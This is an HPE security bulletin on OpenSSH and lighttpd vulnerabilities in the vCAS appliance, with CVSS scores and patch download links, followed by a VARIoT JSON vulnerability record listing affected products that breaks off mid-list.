SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05247375 Version: 1
HPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System (vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information, Remote Denial of Service (DoS), Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-08-29 Last Updated: 2016-08-29
Potential Security Impact: Remote Denial of Service (DoS), Disclosure of Information, Unauthorized Modification Of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in the lighttpd and OpenSSH version used in HPE Remote Device Access: Virtual Customer Access System (vCAS). These vulnerabilities could be exploited remotely resulting in unauthorized modification of information, denial of service (DoS), and disclosure of information.
References:
CVE-2015-3200 CVE-2016-0777 CVE-2016-0778 PSRT110211
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA 8.1) and earlier.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-3200
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CVE-2016-0777
6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CVE-2016-0778
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following updates available to resolve the vulnerabilities in Remote Device Access: Virtual Customer Access System (vCAS)
vCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and hp-rdacas-16.05-10482.ova.
The Oracle VirtualBox kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova
The VMware ESX(i) and VMware Player kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova
HISTORY Version:1 (rev.1) - 29 August 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0029", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "7" }, { "model": "solaris", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "11.3" }, { "model": "openssh", "scope": "eq", "trust": 1.6, "vendor": "openbsd", "version": "5.6" }, { "model": "openssh", "scope": "eq", "trust": 1.6, "vendor": "openbsd", "version": "5.4" }, { "model": "openssh", "scope": "eq", "trust": 1.6, "vendor": "openbsd", "version": "5.5" }, { "model": "openssh", "scope": "eq", "trust": 1.6, "vendor": "openbsd", "version": "5.8" }, { "model": "openssh", "scope": "eq", "trust": 1.6, "vendor": "openbsd", "version": "5.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.1" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.6" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.8" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.0" }, { "model": "remote device access virtual customer access system", "scope": "lte", "trust": 1.0, "vendor": "hp", "version": "15.07" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.2" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.2" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.9" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.1" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.1" }, { "model": "unified threat management software", "scope": "eq", "trust": 1.0, "vendor": "sophos", "version": "9.318" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.9" }, { "model": "unified threat management software", "scope": "eq", "trust": 1.0, "vendor": "sophos", "version": "9.353" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.4" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "debian gnu linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hardened bsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openbsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openssh", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.16" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1" }, { "model": "junos 14.2r2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "junos 13.3r4", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.3" }, { "model": "purepower integrated manager service appliance", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "junos 12.1x46-d35", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager kvm host", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "0" }, { "model": "pan-os", "scope": "ne", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.1.3" }, { "model": "purview", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "7.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.0.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.0" }, { "model": "junos 15.1x49-d40", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "mac os", "scope": "ne", "trust": 0.6, "vendor": "apple", "version": "x10.11.4" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.17" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1.10" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.18" }, { "model": "ids/ips", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.0.1" }, { "model": "junos 13.3r2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.11" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "15.7" }, { "model": "junos 15.1x49-d15", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.6, "vendor": "slackware", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "junos 14.1r3", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.10" }, { "model": "junos 12.1x46-d45", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.14" }, { "model": "junos 13.3r5", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 15.1r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "6.2p1", "scope": null, "trust": 0.6, "vendor": "openssh", "version": null }, { "model": "junos 12.1x47-d11", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager vhmc appliance", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.1.0" }, { "model": "junos 15.1x49-d10", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5.3" }, { "model": "junos 15.1f3", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.8" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.0.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "15.7.38" }, { "model": "junos 15.1r2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 15.1f2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "5.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.37" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.5" }, { "model": "junos 15.1x49-d20", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "netsight appliance", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "5.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1.4" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.6" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.1.2" }, { "model": "junos 14.1r5", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.4" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "nac appliance", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "6.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "5.7" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "5.6p1", "scope": null, "trust": 0.6, "vendor": "openssh", "version": null }, { "model": "nsm4000", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "0" }, { "model": "junos 13.3r6", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 12.1x47-d20", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "6.0" }, { "model": "junos 14.1r7", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 14.1r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "14.06" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "16.2" }, { "model": "linux -current", "scope": null, "trust": 0.6, "vendor": "slackware", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.1.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.15" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.11.2" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.1" }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.4" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.6, "vendor": "suse", "version": "11.4" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.37" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "5.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "junos 14.1r4", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "15.10" }, { "model": "i", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.1" }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "15.07" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.0" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "10.11" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "7.1p2", "scope": "ne", "trust": 0.6, "vendor": "openssh", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.0.4" }, { "model": "junos 12.3x48-d25", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 12.3x48-d15", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "14.04" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.1" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "15.7.31" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.0.13" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "5.5" }, { "model": "linux", "scope": null, "trust": 0.6, "vendor": "gentoo", "version": null }, { "model": "mac os security update", "scope": "ne", "trust": 0.6, "vendor": "apple", "version": "x2016-0020" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.8" }, { "model": "junos 14.2r6", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1.3" }, { "model": "junos 12.3x48-d30", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.0" }, { "model": "i", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.2" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "4.4" }, { "model": "junos 12.1x47-d25", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "junos 12.3r12", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager appliance", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.1" }, { "model": "flex system chassis management module 2pet", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.11.1" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.0.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.0.6" }, { "model": "junos 15.1f1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.1.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.0.12" }, { "model": "junos 13.3r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.6, "vendor": "s u s e", "version": "13.1" }, { "model": "junos 12.1x46-d30", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "i", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "16.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.11.3" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.3" }, { "model": "junos 13.3r3", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d25", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "6.2p2", "scope": null, "trust": 0.6, "vendor": "openssh", "version": null }, { "model": "junos 12.3x48-d20", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "7.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "12.04" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.1.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.2" }, { "model": "purview", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "5.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.1.3" }, { "model": "junos 12.1x46-d36", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "purview", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "6.3" }, { "model": "junos 14.2r4", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.6" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.2.1" }, { "model": "junos 15.1r3", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "5.1" }, { "model": "junos 12.1x46-d40", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.1.1" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.1" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "7.1" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.2" }, { "model": "junos 15.1x49-d30", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "virtual customer access system", "scope": "ne", "trust": 0.6, "vendor": "hp", "version": "16.05" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.14" }, { "model": "junos 13.3r9", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "remote device access", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "8.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1.9" }, { "model": "junos 14.2r3", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 14.2r5", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.6, "vendor": "debian", "version": "6.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "5.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.0.7" }, { "model": "aix", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "6.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "remote device access", "scope": "ne", "trust": 0.6, "vendor": "hp", "version": "8.7" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.2" }, { "model": "junos 